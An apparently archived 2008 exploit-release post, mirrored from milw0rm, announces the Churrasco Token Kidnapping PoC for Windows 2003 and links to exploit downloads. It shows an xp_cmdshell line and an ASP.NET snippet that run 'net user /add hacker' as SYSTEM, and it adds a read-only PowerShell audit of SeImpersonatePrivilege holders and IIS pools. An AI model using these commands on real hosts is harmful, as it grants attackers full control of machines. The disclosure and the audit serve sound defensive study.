(From http://nomoreroot.blogspot.com/2008/10/windows-2003-poc-exploit-for-token.html)

It has been a long time since the Token Kidnapping presentation (http://www.argeniss.com/research/TokenKidnapping.pdf) was published, so I decided to release a PoC exploit for Win2k3 that allows executing code under the SYSTEM account.

Basically, if you can run code under any service in Win2k3 then you can own Windows. This is because Windows service accounts (LocalSystem, and by default also NETWORK SERVICE and LOCAL SERVICE) hold the "Impersonate a client after authentication" right, SeImpersonatePrivilege, which is the only thing Token Kidnapping needs. Other processes (not services) that can impersonate are the IIS 6 worker processes (w3wp.exe), which run as NETWORK SERVICE by default, so if you can run code from an ASP .NET or classic ASP web application then you can own Windows too. If you provide shared hosting services then I would recommend not allowing users to run this kind of code from ASP.

- SQL Server is a nice target for the exploit if you are a DBA and want to own Windows. xp_cmdshell runs the command under the SQL Server service account, so the impersonation right is already there; the call needs sysadmin, and churrasco.exe has to be reachable from that context (on the PATH, or given by full path):

exec xp_cmdshell 'churrasco "net user /add hacker"'

- Exploiting IIS 6 with ASP .NET (code-behind fragment; churrasco.exe is uploaded into the web application directory so Server.MapPath can locate it):

...
// Launch churrasco.exe from inside the worker process (w3wp.exe), which holds the
// impersonation right; the exploit runs the quoted command as SYSTEM.
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.RedirectStandardOutput = true;               // capture the exploit's output
myP.StartInfo.FileName = Server.MapPath("churrasco.exe");  // physical path of the uploaded binary
myP.StartInfo.UseShellExecute = false;                     // required when redirecting stdout
myP.StartInfo.Arguments = " \"net user /add hacker\" ";    // command churrasco executes as SYSTEM
myP.Start();
string output = myP.StandardOutput.ReadToEnd();            // blocks until churrasco exits
Response.Write(output);                                    // echo the result in the HTTP response
...

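Whether any of the above works on a given box comes down to one question: which accounts on the host hold SeImpersonatePrivilege, and which code (services, IIS 6 application pools, the SQL Server service) runs under them. The PowerShell script below is an added example written for this page, not part of Cesar's post or of the Churrasco package; it audits exactly that on a Windows Server 2003 host. It assumes Windows PowerShell 2.0 is installed, that it is run as a local administrator (secedit and the WMI queries need it), and that the IIS 6 WMI provider (the root\MicrosoftIISv2 namespace) is present when IIS is installed. It only reads configuration and changes nothing.

```powershell
# Added example (not from the original post or the Churrasco package):
# audit the Token Kidnapping preconditions on a Windows Server 2003 host.
# Assumes PowerShell 2.0+, run as a local administrator.

# --- 0. Does the context this script runs in hold the right? -----------------
# whoami /priv lists every privilege in the token, enabled or not, so this also
# works from a limited context such as a web shell where secedit would fail.
$self = whoami /priv | Where-Object { $_ -match 'SeImpersonatePrivilege' }
Write-Host ("This session {0} SeImpersonatePrivilege" -f $(if ($self) { 'HOLDS' } else { 'does not hold' }))
Write-Host ''

# --- 1. Which accounts are granted the right on this host? -------------------
# secedit exports the local User Rights Assignment; the value is a SID list, e.g.
#   SeImpersonatePrivilege = *S-1-5-32-544,*S-1-5-6,*S-1-5-19,*S-1-5-20
$inf = Join-Path $env:TEMP 'secpol-audit.inf'
& secedit /export /cfg $inf /quiet | Out-Null
$line = Get-Content $inf | Where-Object { $_ -match '^SeImpersonatePrivilege' }
Remove-Item $inf -ErrorAction SilentlyContinue

$holders = @()
if ($line) {
    $sids = ($line -split '=')[1].Trim() -split ','
    foreach ($sid in $sids) {
        $sid = $sid.Trim().TrimStart('*')
        try {
            # Resolve the SID to a name (S-1-5-20 -> NT AUTHORITY\NETWORK SERVICE, etc.)
            $acct = (New-Object System.Security.Principal.SecurityIdentifier($sid)).Translate([System.Security.Principal.NTAccount]).Value
        } catch {
            $acct = $sid   # unresolvable SID: print it raw
        }
        $holders += $acct
    }
}
Write-Host "Accounts granted 'Impersonate a client after authentication':"
$holders | ForEach-Object { Write-Host "    $_" }
Write-Host ''

# --- 2. Which running services execute under which logon account? ------------
# Code running inside any service whose account appears in the list above can
# run churrasco.exe. Look for W3SVC (IIS) and MSSQLSERVER / MSSQL$instance here.
$svc = Get-WmiObject Win32_Service | Where-Object { $_.State -eq 'Running' }
Write-Host 'Running services by logon account:'
$svc | Group-Object StartName | Sort-Object Count -Descending | ForEach-Object {
    Write-Host ("    {0,-32} {1,3} service(s)" -f $_.Name, $_.Count)
}
Write-Host ''

# --- 3. IIS 6 application pool identities ------------------------------------
# IIS 6 exposes its metabase through the root\MicrosoftIISv2 WMI provider.
# AppPoolIdentityType: 0 = LocalSystem, 1 = LocalService, 2 = NetworkService,
# 3 = a specific user named in WAMUserName. Types 0-2 hold the right by default,
# so ASP/ASP.NET code in those pools meets the exploit's precondition.
$typeNames = @{ 0 = 'LocalSystem'; 1 = 'LocalService'; 2 = 'NetworkService'; 3 = 'SpecificUser' }
$pools = Get-WmiObject -Namespace 'root\MicrosoftIISv2' -Class IIsApplicationPoolSetting -ErrorAction SilentlyContinue
if ($pools) {
    Write-Host 'IIS 6 application pools:'
    foreach ($p in $pools) {
        $type  = [int]$p.AppPoolIdentityType
        $ident = $typeNames[$type]
        if ($type -eq 3) { $ident = "SpecificUser ($($p.WAMUserName))" }
        $risk  = if ($type -lt 3) { 'can impersonate' } else { "check '$($p.WAMUserName)' against the list above" }
        Write-Host ("    {0,-40} {1,-36} {2}" -f $p.Name, $ident, $risk)
    }
} else {
    Write-Host 'IIS 6 WMI provider not found (IIS not installed, or its WMI provider is missing).'
}
```

The first list is the authoritative answer to "who can kidnap a token on this host"; the service list shows which of those accounts actually have code running (W3SVC and the SQL Server service are the two the post targets), and the pool list tells a shared-hosting operator whether a customer's ASP.NET code inherits the right. For the SQL Server case also check whether xp_cmdshell is enabled: on SQL Server 2005 it is off by default (`SELECT value_in_use FROM sys.configurations WHERE name = 'xp_cmdshell'`), while SQL Server 2000 ships with it available to sysadmin.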
You can find the PoC exploit here: http://www.argeniss.com/research/Churrasco.zip

backup link: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/6705.zip (2008-Churrasco.zip)

Enjoy.

Cesar.

# milw0rm.com [2008-10-08]